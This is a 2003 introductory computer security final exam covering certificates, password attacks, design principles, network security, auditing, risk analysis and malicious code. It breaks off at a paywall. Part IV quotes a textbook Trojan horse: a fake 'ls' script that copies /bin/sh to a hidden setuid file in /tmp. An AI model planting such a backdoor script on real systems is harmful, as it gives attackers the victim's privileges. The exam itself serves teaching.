1IS2935 Introduction to Computer Security Final Examination Thursday, December 11, 2003 Name: Email: Total Time : 2:30 Hours Total Score : 100 The questions have been grouped into four parts. These parts roughly correspond to the different sets of chapters as I had indicated in the class. Part 1: (Total Score 20) Part 2: (Total Score 20) Part 3: (Total Score 30) Part 4: (Total Score 30) Note that scores for each question may be different – so spend time accordingly on each question. Be precise and clear in your answers. Score Part 1 (20) Part 2 (20) Part 3 (30) Part 4 (30) Total = Best of Lucks!!2Part I: Certificates, Authentication and Identity (Total Score 20) 1. Refer to the Merklee’s tree shown below. [1, 3] a. Indicate the hash values that need to be computed (use circles) and that need to be obtained (use rectangular boxes) to validate C3 b. At the time C3 is being evaluated, suppose that C1 gets corrupted. How does it affect the validation of C3? Assume that the hash values are all available in the same file, but the certificates are not. Provide enough arguments to substantiate your point. 2. Recall that X<<Y>> represents Y’s certificate signed by X. Consider the following certificates and answer (a) and (b) below. [2, 2] { Dan<<Alice>> { Cathy<<Bob> { Dan<<Cathy>> { Cathy<<Dan>> (a) Show steps (or just write the signature chain) that Alice takes to validate Bob’s certificate: h(1,1) h(2,2) h(3,3) h(4,4) h(1,4) h(1,2) h(3,4) C1 C2 C3 C43(b) Show steps (or just write the signature chain) that Bob takes to validate Alice’s certificate: 3. What is a dictionary attack? Briefly describe the two types of dictionary attacks. [4] 4. Provide argument(s) for or against the following statement: [2] “Use of salt increases the effort needed to launch a dictionary attack on passwords.” 5. For the S/Key scheme for password authentication, write the following: [2, 2]. a. If h is the hash function used, (i) the n keys, k1, k2, .., kn are generated as follows: _______________________________________ (ii) the keys are used in the following sequence: _______________________________________ b. Assuming that h cannot be inverted, the attacker cannot determine the next password the user will use because of the following reason: 6. Identify two biometric authentication systems and give examples of attacks on them. [2] (Provide answer on the back of the adjacent page)4Part II: Design Principles, Assurance (Total Score 20) 1. Write what the following design principles mean. [6] Fail-safe defaults Economy of mechanisms Psychological acceptability 2. What do you mean by operational assurance? State its importance. [2] 3. What are the three required properties of a reference validation mechanism? [2] 4. Five two characteristic of each of the following models of software development: [4] a. Extreme programming5b. System assembly from reusable components 5. Briefly write about two ways checking that design meets requirements specified for a system. [2] 6. Indicate true or false for the following. [4] a. The following are desirable implementation considerations for operational assurance: i. Modularity [ ] True [ ] False ii. Low level language for implementation [ ] True [ ] False b. One weakness of TCSEC is that it is based heavily on integrity requirements and ignores availability. [ ] True [ ] False c. Common Criteria has a component that addresses country specific security evaluation needs of some nations. [ ] True [ ] False6Part III: Network Security, Auditing, Risk Management, Legal/Ethical Issues (Total Score 30) 1. What are the functions of the following components of the Secure Socket Layer protocol? [1, 1] d. SSL Record Protocol e. SSL Handshake protocol 2. Provide argument(s) for or against the following statement: [2] “IPSec is strictly independent and strictly an end-to-end protocol between two application level entities” 3. Differentiate between the following [2, 2] a. The two IPSec protocols. b. The two IPSec modes7 4. State what you understand by the following: [2] a. Security Association Bundle b. Demilitarized zone (DMZ) 5. Name four goals of auditing. [2] 6. Recall that we use constraint pi: action ⇒ condition. Show these constraints and identify what should be logged for a system employing the following Biba’s integrity model. Do you strictly need to log subject (S) and object (O)? [4] Biba’s Model: Strict Integrity Policy { s r o ⇔ i(s) ≤ i(o) (no read-down) { s w o ⇔ i(o) ≤ i(s) (no write-up) { s1 x s2 ⇔ i(s2) ≤ i(s1) 7. Let U be a set of user, P be a policy that defines a set of information C(U) that U cannot see. What do you mean by the following? [2] P is such that “C(U) can’t leave site”88. One way to sanitize information is to replace each piece of information with random pseudonyms. What would be a problem with that? [2] 9. Enumerate the key Risk Assessment steps [3] 10. For the risks and the security mechanism indicated below, calculate and insert the values as per the given data: [4] • Risks: o disclosure of company confidential information, o computation based on incorrect data • Cost to correct data: $3,000,000 o @20% liklihood per year: ________ o Effectiveness of access control software: 60%: -$60,000 o Cost of access control software: +$45,000 o Expected annual costs due to loss and controls: ________ o Savings: ________ 11. Answer only one of the following: [3] a. Differentiate between spatial domain and frequency domain watermarking. b. Write differences among copyright, patent and trade secret. c. Briefly explain two tools that are useful for forensic analysis of Computer intrusions.9Part IV: Malicious code, Vulnerability, Intrusion Detection, Physical Security & Disaster Recovery (30) 1. Define the following terms [2] Polymorphic virus: Worm: 2. Recall the following example of a Trojan horse [3] { Perpetrator 1. cat >/homes/victim1/ls <<eof 2. cp /bin/sh /tmp/.xxsh 3. chmod u+s,o+x /tmp/.xxsh 4. rm ./ls 5. ls $* 6. eof That is, the perpetrator creates a file called ls in Victim1’s home directory { Victim1 ls That is, when Victim1 executes the file
View Full Document
Unlocking...